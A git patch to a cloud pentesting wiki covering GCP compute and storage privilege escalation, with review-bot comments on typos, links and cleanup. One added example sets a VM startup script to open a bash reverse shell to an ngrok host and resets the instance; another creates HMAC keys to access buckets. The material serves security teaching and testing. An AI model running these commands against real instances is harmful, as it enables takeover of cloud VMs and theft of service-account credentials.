From 6743320e7eb15f26064a0b937b6a6122fab50760 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 16 Jun 2024 21:21:45 +0000 Subject: [PATCH] GITBOOK-627: No subject --- .../gcp-compute-privesc/README.md | 24 ++++++++++++---- .../gcp-storage-privesc.md | 5 +++- .../gcp-compute-instances-enum/README.md | 28 ++++++++++++------- 3 files changed, 41 insertions(+), 16 deletions(-) diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md index 5150daca21..cb52d1225f 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -22,6 +22,10 @@ For more information about Compute and VPC (netowork) in GCP check: [gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/) {% endcontent-ref %} +{% hint style="danger" %} +Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! +{% endhint %} + ### `compute.projects.setCommonInstanceMetadata` With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ @@ -36,6 +40,16 @@ For more information about how to exploit this permission check: [gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md) {% endcontent-ref %} +You could aslo perform this attack by adding new startup-script and rebooting the instance: + +```bash +gcloud compute instances add-metadata my-vm-instance \ + --metadata startup-script='#!/bin/bash +bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &' + +gcloud compute instances reset my-vm-instance +``` + ### `compute.instances.setMetadata` This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**. 
@@ -88,12 +102,12 @@ Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to det ### Bypass Access Scopes -Following this link you find some [**ideas to try to bypass access scopes**](../../../gcp-security/gcp-privilege-escalation/). +Following this link you find some [**ideas to try to bypass access scopes**](../). ### Local Privilege Escalation in GCP Compute instance -{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) +{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %} +[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md) {% endcontent-ref %} ## References @@ -109,7 +123,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index 45292fe588..50fda85702 100644 --- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -50,11 +50,14 @@ Cloud Storage's "interoperability" feature, designed for **cross-cloud interacti gsutil hmac create # Configure gsutil to use it -gsutil config -a gcloud config set pass_credentials_to_gsutil false +gsutil config -a # Use it gsutil ls gs://[BUCKET_NAME] + +# Restore +gcloud config set pass_credentials_to_gsutil true ``` Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md index ef014137dc..d519e5962d 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md +++ b/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -97,8 +97,8 @@ gcloud compute disks get-iam-policy For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page: -{% content-ref url="../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../../../gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) +{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} +[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) {% endcontent-ref %} ### Privilege Escalation 
@@ -111,20 +111,20 @@ In the following page, you can check how to **abuse compute permissions to escal ### Unauthenticated Enum -{% content-ref url="../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %} -[gcp-compute-unauthenticated-enum.md](../../../gcp-security/gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) +{% content-ref url="../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %} +[gcp-compute-unauthenticated-enum.md](../../gcp-unaunthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) {% endcontent-ref %} ### Post Exploitation -{% content-ref url="../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md" %} -[gcp-compute-post-exploitation.md](../../../gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) +{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %} +[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md) {% endcontent-ref %} ### Persistence -{% content-ref url="../../../gcp-security/gcp-persistence/gcp-compute-persistence.md" %} -[gcp-compute-persistence.md](../../../gcp-security/gcp-persistence/gcp-compute-persistence.md) +{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %} +[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md) {% endcontent-ref %} ## Serial Console Logs 
@@ -141,6 +141,14 @@ You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/r gcloud compute instances get-serial-port-output ``` +## Startup Scripts output + +It's possible to see the **output of the statup scripts** from the VM executing: + +```bash +sudo journalctl -u google-startup-scripts.service +``` + ## OS Configuration Manager You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM. @@ -246,7 +254,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
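Review bot: in the new `## Startup Scripts output` section at `@@ -141,6 +141,14 @@` of gcp-compute-instances-enum/README.md, `statup` should be `startup`, and the heading should be `## Startup Scripts Output` to match the title case of the neighbouring `## Serial Console Logs` and `## OS Configuration Manager`. The text should also say that `google-startup-scripts.service` is the unit installed by the Google guest environment, so the `journalctl` command only works on images that ship it; on those images the startup-script output is also written to the serial console, so the `gcloud compute instances get-serial-port-output` command shown just above this hunk gives a defender the same information without needing a shell on the VM.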
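Review bot: the directory name `gcp-unaunthenticated-enum-and-access` in the `content-ref` at `@@ -111,20 +111,20 @@` of gcp-compute-instances-enum/README.md carries a spelling error that was also present in the old absolute path; if it is the real on-disk directory it must stay exactly as written (GitBook links are case- and spelling-sensitive), otherwise both the `url=` attribute and the bracketed link text need the corrected name, since the two are maintained by hand and will silently diverge.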
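Review bot: the new relative target at `@@ -97,8 +97,8 @@` of gcp-compute-instances-enum/README.md resolves correctly (`../../` from `gcp-services/gcp-compute-instances-enum/` lands in `gcp-security/`, and `gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md` is the same file the old `../../../gcp-security/...` path pointed at); the same holds for the `../` and `../gcp-local-privilege-escalation-ssh-pivoting.md` rewrites at `@@ -88,12 +102,12 @@` of gcp-compute-privesc/README.md. Consider adding a link checker to CI, because the `url=` attribute and the bracketed link text are edited separately in every block and nothing in the patch verifies they still agree.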
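Review bot: the `# Restore` step added at `@@ -50,11 +50,14 @@` of gcp-storage-privesc.md only re-enables `pass_credentials_to_gsutil`; it leaves the HMAC key from `gsutil hmac create` active and its secret in the `.boto` file that `gsutil config -a` writes, so the cleanup is incomplete and a long-lived credential stays on disk and in the project. Add the key deactivation and deletion (`gsutil hmac update -s INACTIVE` followed by `gsutil hmac delete`) and the removal of the `.boto` entry to the restore block. The reordering of `gcloud config set pass_credentials_to_gsutil false` ahead of `gsutil config -a` is the actual fix in this hunk and deserves a comment: without it gsutil keeps using the gcloud OAuth credentials and the HMAC key is never exercised, which is why the old ordering did not test what the section claims.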
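Review bot: in the paragraph added at `@@ -36,6 +40,16 @@` of gcp-compute-privesc/README.md, `aslo` should be `also` and `adding new startup-script` should be `adding a new startup-script`. The example hard-codes a third-party tunnel hostname and port (`0.tcp.eu.ngrok.io/18347`); use an obvious placeholder such as `<HOST>/<PORT>`, the way the storage page already uses `[BUCKET_NAME]`. The text should also state that `gcloud compute instances add-metadata` replaces any existing `startup-script` value on the instance and that `reset` is a hard power-cycle, so the original script is lost and the VM drops unsaved state, and that both calls are recorded in the project's Admin Activity audit log, which is what a defender would alert on. Finally, the `actAs` requirement from the new danger hint applies to this variant as well, since it is also a metadata change; a one-line back-reference here would avoid readers assuming the startup-script route sidesteps it.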
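Review bot: in the `{% hint style="danger" %}` block added at `@@ -22,6 +22,10 @@` of gcp-compute-privesc/README.md, `atacks` should be `attacks` and `require to modify` should be `require modifying`. `actAs` should be written out as the IAM permission `iam.serviceAccounts.actAs` on the attached service account, so readers can search for it in an IAM policy; it is also the permission a defender audits when deciding who is effectively able to take over an instance's identity through metadata, which is the point the hint is making.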
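Review bot: the backslash-escaped underscore in the link target, `https://twitter.com/hacktricks\_live`, in the footer hunk at `@@ -9,7 +9,7 @@` of gcp-compute-privesc/README.md puts a literal backslash into the URL under CommonMark renderers; only the link text `[**@hacktricks\_live**]` needs the escape. The same applies to the identical footer hunks at `@@ -109,7 +123,7 @@` of that file and at `@@ -9,7 +9,7 @@` and `@@ -246,7 +254,7 @@` of gcp-compute-instances-enum/README.md. If this is GitBook's export normalisation it is harmless inside GitBook, but it should be reverted in the link targets before the files are rendered anywhere else.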